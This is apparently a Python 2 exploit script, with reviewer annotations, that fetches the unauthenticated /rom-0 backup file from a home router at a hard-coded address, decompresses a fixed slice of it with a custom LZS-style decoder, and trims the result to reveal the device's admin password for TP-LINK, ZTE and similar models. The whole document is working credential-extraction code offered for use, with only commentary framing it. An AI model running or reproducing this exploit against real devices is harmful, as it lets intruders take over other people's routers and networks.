- import os
- import sys
- import urllib
- import requests
- import telnetlib
- import collections
class BitReader:
    """Most-significant-bit-first cursor over a byte string.

    The constructor calls ord() on every element, so the input must be an
    iterable of one-character strings (a Python 2 ``str``). Reading past the
    end is not guarded: ``getBit`` lets ``deque.popleft`` raise IndexError.
    """

    def __init__(self, bytes):
        # Pre-expand every character into eight booleans, high bit first.
        self._bits = collections.deque()
        for ch in bytes:
            value = ord(ch)
            for shift in range(7, -1, -1):
                self._bits.append(bool((value >> shift) & 1))

    def getBit(self):
        """Consume and return the next bit as a bool."""
        return self._bits.popleft()

    def getBits(self, num):
        """Consume ``num`` bits and return them as an unsigned integer."""
        res = 0
        for _ in range(num):
            # Shift in one bit at a time; the first bit read ends up highest.
            res = (res << 1) + self.getBit()
        return res

    def getByte(self):
        """Consume eight bits and return them as an integer 0..255."""
        return self.getBits(8)

    def __len__(self):
        """Return the number of bits not yet consumed."""
        return len(self._bits)
class RingList:
    """Bounded FIFO window: once ``length`` items are held, each append
    drops the oldest item first.

    Indexing is only bounds-checked on the high side: an index >= size()
    yields None, while a negative index is passed straight to the deque and
    raises IndexError if it reaches before the first stored item.
    """

    def __init__(self, length):
        self.__max__ = length
        self.__full__ = False
        self.__data__ = collections.deque()

    def append(self, x):
        """Add ``x`` at the newest end, evicting the oldest item when full."""
        buf = self.__data__
        if self.__full__:
            buf.popleft()
        buf.append(x)
        # The flag latches the first time the window reaches capacity.
        if len(buf) == self.__max__:
            self.__full__ = True

    def get(self):
        """Return the underlying deque (not a copy)."""
        return self.__data__

    def size(self):
        """Return how many items are currently stored."""
        return len(self.__data__)

    def maxsize(self):
        """Return the capacity given to the constructor."""
        return self.__max__

    def __getitem__(self, n):
        if n < self.size():
            return self.__data__[n]
        return None
def decodePasswordLocal(host):
    """Fetch ``http://<host>/rom-0`` and decode one fixed slice of it to text.

    The function name and the author's comments indicate that the decoded
    text is expected to contain the device password. The request carries no
    credentials, so it only succeeds against a device that serves /rom-0 to
    unauthenticated clients; requests for that path are the observable to
    look for in management-interface logs.

    Python 2 only as written (urllib.urlretrieve, file(), xrange).

    NOTE(review): the paste lost its indentation; the nesting below is a
    reconstruction and should be confirmed against the original file.

    :param host: host name or address placed verbatim into the URL.
    :returns: the decoded, filtered and vendor-trimmed string.
    """
    # The result may be wrong when the vendor-marker trimming at the end
    # misfires; in that case print the untrimmed text (see below) and read
    # the value out by hand.
    fname = 'rom-0'
    # A fixed file name in the current working directory: any existing file
    # called 'rom-0' there is deleted before the download.
    if os.path.isfile(fname) == True:
        os.remove(fname)
    # Plain HTTP, no authentication, no timeout argument.
    urllib.urlretrieve ("http://"+host+"/rom-0", fname)
    # Hard-coded byte range inside the downloaded file; nothing checks that
    # the file is actually that long.
    fpos=8568
    fend=8788
    # Opened in text mode and never closed in the visible code.
    fhandle=file('rom-0')
    fhandle.seek(fpos)
    chunk="*"  # not used anywhere in the visible code
    amount=221
    while fpos < fend:
        if fend-fpos < amount:
            # No-op self-assignment; presumably meant to clamp the read to
            # fend - fpos - TODO confirm.
            amount = amount
        data = fhandle.read(amount)
        # If read() returns an empty string (file shorter than fend), fpos
        # stops advancing and this loop never terminates.
        fpos += len(data)
    reader = BitReader(data)
    result = ''
    # 2048-entry history of output bytes for back-references.
    window = RingList(2048)
    # Bit-stream decompressor (reads like an LZS-style scheme - reviewer's
    # reading, confirm). Running out of bits before the end marker is not
    # handled: BitReader.getBit raises IndexError.
    while True:
        bit = reader.getBit()
        if not bit:
            # Flag 0: the next 8 bits are a literal byte.
            char = reader.getByte()
            result += chr(char)
            window.append(char)
        else:
            # Flag 1: back-reference. A second flag picks the offset width.
            bit = reader.getBit()
            if bit:
                offset = reader.getBits(7)
                if offset == 0:
                    # A 7-bit offset of zero ends the stream.
                    break
            else:
                offset = reader.getBits(11)
            # Variable-length copy count: 2 bits give 2..4, two more bits
            # give 5..7, then 4-bit groups where each 15 means "continue".
            lenField = reader.getBits(2)
            if lenField < 3:
                lenght = lenField + 2
            else:
                lenField <<= 2
                lenField += reader.getBits(2)
                if lenField < 15:
                    lenght = (lenField & 0x0f) + 5
                else:
                    lenCounter = 0
                    lenField = reader.getBits(4)
                    while lenField == 15:
                        lenField = reader.getBits(4)
                        lenCounter += 1
                    lenght = 15*lenCounter + 8 + lenField
            for i in xrange(lenght):
                # Copy from `offset` entries back. RingList.__getitem__ does
                # not guard negative indexes, so an offset larger than the
                # current history raises IndexError.
                char = window[-offset]
                result += chr(char)
                window.append(char)
    # Drop control characters, interpret backslash escapes found in the
    # device-supplied text, then discard anything non-ASCII. The
    # unicode_escape step may raise on malformed escapes - not handled here.
    result = filter_non_printable(result).decode('unicode_escape').encode('ascii','ignore')
    # If the trimmed value below looks wrong, print the untrimmed text here
    # and read the value out by hand.
    #print result
    # Vendor-marker trimming: when a marker is present, whitespace is
    # removed, everything from the first marker onward is cut, and the first
    # remaining character is dropped. The three checks run in sequence on
    # the same string.
    if 'TP-LINK' in result:
        result = ''.join(result.split()).split('TP-LINK', 1)[0] + 'TP-LINK';
        result = result.replace("TP-LINK", "")
        result = result[1:]
    if 'ZTE' in result:
        result = ''.join(result.split()).split('ZTE', 1)[0] + 'ZTE';
        result = result.replace("ZTE", "")
        result = result[1:]
    if 'tc160' in result:
        result = ''.join(result.split()).split('tc160', 1)[0] + 'tc160';
        result = result.replace("tc160", "")
        result = result[1:]
    return result
def filter_non_printable(str):
    """Return ``str`` without control characters below 0x20, keeping TAB.

    Every character with a code point above 31 is kept, which includes DEL
    (127) and anything non-ASCII.
    """
    kept = []
    for ch in str:
        code = ord(ch)
        if code == 9 or code > 31:
            kept.append(ch)
    return ''.join(kept)
# Script entry point: runs at import time against a hard-coded private
# (RFC 1918) address and prints the decoded value wrapped in double quotes.
decoded = decodePasswordLocal("192.168.1.1")
print('"' + decoded + '"')